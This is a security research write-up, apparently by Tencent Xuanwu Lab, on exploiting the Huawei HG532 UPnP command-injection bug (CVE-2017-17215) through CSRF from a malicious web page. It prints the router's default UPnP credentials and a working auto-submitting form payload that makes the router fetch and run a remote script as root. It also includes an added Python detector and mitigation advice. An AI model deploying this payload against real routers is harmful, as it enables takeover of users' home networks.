

New Exploration of the Huawei HG532 Remote Command Execution Vulnerability -- Tencent Security Xuanwu Lab

Posted by harmelink at 2020-02-27

On November 27, 2017, Check Point reported a remote command execution vulnerability in the Huawei HG532 series routers, assigned CVE-2017-17215. To exploit it, a specially crafted HTTP request is sent to port 37215, on which the router's UPnP service listens, and the command is executed. This port is not reachable from the Internet by default, but because of the huge number of routers in this series there are still many devices whose port 37215 is reachable from the Internet. Worms are currently spreading through these Internet-exposed ports [1].

Recently there have been many analyses of the root cause of this vulnerability, both in China and abroad [2], so we will not repeat them here. However, we find that the actual threat is likely more serious than is currently assumed, and some of the defensive advice given for it is insufficient or even wrong. The HG532 devices with port 37215 exposed on the Internet are only a small fraction of the total, yet that is already enough for worms to spread. What if the remaining devices, whose port 37215 is reachable only from the LAN, can also be exploited by an attacker?

In 2013 a wave of DNS hijacking attacks against home routers in China broke out; it used the CSRF technique from web security. Can the same technique be used to exploit this HG532 vulnerability? If so, then as long as an HG532 user is lured into opening a malicious page on a phone or computer, the router can be fully controlled by the attacker. We start from the PoC for the vulnerability. In the PoC, successful exploitation requires constructing a POST request with an XML body, and the request must pass HTTP basic authentication on the server side. There is nothing in the payload that must be predicted (no token or nonce). So a CSRF test of this request only has to satisfy two points: pass the server's HTTP basic authentication, and construct the XML attack body.

First, the HTTP basic authentication part. If basic authentication fails, the server returns a 401 error and the vulnerable logic is never reached. Most PoCs circulating online construct an authentication field in the HTTP request header, such as:

Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"

In modern browsers, custom items can only be added to the HTTP request header by sending the request through XMLHttpRequest, and in addition the server must answer the CORS preflight with a list of headers it allows (Access-Control-Allow-Headers). The UPnP service does not allow XMLHttpRequest to add this item to the request header. To bypass that limitation we could use DNS rebinding. But is such a complex attack really necessary?

Looking at the fields of the HTTP basic authentication, the user name and password used are dslf-config:admin. So we only need to construct a form and have it POST to http://dslf-config:admin@routerip:37215; the browser then completes the basic authentication automatically.


The next step is how to construct the XML request body with a form. To stop the browser from encoding the request body, we specify the form's enctype as text/plain. We can then use the values of the name and value attributes of an input tag to assemble the content we want. The CSRF attack payload we finally constructed is shown below.

<body onload='document.forms[0].submit()'>
<form method='POST' enctype='text/plain' action="http://dslf-config:[email protected]:37215/ctrlt/DeviceUpgrade_1">
<input name='<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>a' value='1;$(/bin/busybox wget -g -l /tmp/.f -r /b);</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>'>
</form>
</body>

As long as the attacker lures the user into visiting a page containing the code above, the vulnerable router downloads a shell script from the remote host and executes it as root.
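Seen from the defender's side, the request that such a page produces has two tell-tale features: a text/plain body, which only a browser form would send to this endpoint, and shell metacharacters inside the Upgrade parameters. The following is an added example (not code from the original post or from Tencent) that parses a request to the UPnP Upgrade endpoint and flags both; the host address and the sample bodies are constructed.

```python
import re
from xml.etree import ElementTree as ET

# Constructed sample requests (not captures from a real device). A browser submits a
# text/plain form as "name=value\r\n", so the form's "=" lands inside <NewStatusURL>.
UPGRADE_XML = (
    '<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
    's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body>'
    '<u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">'
    '<NewStatusURL>{status}</NewStatusURL><NewDownloadURL>{download}</NewDownloadURL>'
    '</u:Upgrade></s:Body></s:Envelope>'
)

def http_post(content_type, body):
    # 192.0.2.1 is a documentation address standing in for the router's LAN IP.
    return (f"POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\nHost: 192.0.2.1:37215\r\n"
            f"Content-Type: {content_type}\r\nContent-Length: {len(body)}\r\n\r\n{body}")

BENIGN_REQUEST = http_post("text/xml", UPGRADE_XML.format(
    status="http://fw.example.invalid/status", download="http://fw.example.invalid/fw.bin"))
CSRF_REQUEST = http_post("text/plain", UPGRADE_XML.format(
    status="a=1;$(echo injected);", download="$(echo HUAWEIUPNP)") + "\r\n")

SHELL_META = re.compile(r"[;|&`]|\$\(")  # characters that reach the shell in this bug

def parse_request(raw):
    """Split a raw HTTP request into method, path, lowercase header dict and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return method, path, headers, body

def upgrade_fields(body):
    """Return the text of NewStatusURL/NewDownloadURL from an Upgrade SOAP body, or {}."""
    try:
        root = ET.fromstring(body.strip())
    except ET.ParseError:
        return {}
    wanted = ("NewStatusURL", "NewDownloadURL")
    return {el.tag.rsplit("}", 1)[-1]: el.text or ""
            for el in root.iter() if el.tag.rsplit("}", 1)[-1] in wanted}

def inspect(raw):
    """Return a list of findings for a request to the vulnerable Upgrade endpoint."""
    method, path, headers, body = parse_request(raw)
    findings = []
    if method != "POST" or not path.startswith("/ctrlt/DeviceUpgrade_1"):
        return findings
    if headers.get("content-type", "").startswith("text/plain"):
        findings.append("content-type text/plain: body came from an HTML form, not a UPnP client")
    for name, value in upgrade_fields(body).items():
        if SHELL_META.search(value):
            findings.append(f"shell metacharacters in {name}: {value!r}")
    return findings
```

Run inspect() over requests logged by a proxy or IDS in front of port 37215; a UPnP client sending text/xml with plain URLs yields no findings.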

So in fact almost all vulnerable Huawei HG532 routers are at risk of remote attack, not only those with port 37215 exposed on the Internet. A text message carrying a malicious link is enough for an attacker to take control of your router. Once the router is controlled, other devices on the LAN may be compromised as well.

At the same time, according to our tests, even if the user disables the UPnP service, the vulnerable router can still be attacked after a reboot. Changing the router's management password does not change the password used for the UPnP service's basic authentication. Therefore disabling UPnP and changing the management password are not viable defenses against this vulnerability. Furthermore, even with the HG532's built-in firewall level set to high, the router cannot block this kind of attack. The most effective defense is to install new firmware. The latest firmware currently available on the HG532e product page [4] is the version dated November 7, 2016. Although the official security notice does not state that this firmware is no longer affected by CVE-2017-17215, according to our analysis and testing, at least the known CVE-2017-17215 attack method does not work against this firmware version.

In addition, changing the router's LAN-side IP address to a non-default address, as shown in the figure below, also interferes with the attack. However, an attacker still has many other ways to learn the router's real LAN-side IP address. Finally, thanks to TK for the attack ideas, and to huimingliu and HyperChem for their great help in obtaining a shell on the router.

Demo video:

References
[1] Tencent honeypot system captures the high-risk IoT worm Okiru, http://slab.qq.com/news/tech/1705.html
[2] Huawei HG532 series router remote command execution vulnerability analysis, https://paper.seebug.org/490/
[3] Statement on the remote code execution security vulnerability in the HG532 product, http://www.huawei.com/cn/psirt/security-notices/huawei-sn-20171130-01-hg532-cn
[4] HG532e product page, http://m.huawei.com/cnxmobile/consumer-ncbdtest/home-internet/broadband-devices/detail/hg532e-cn.htm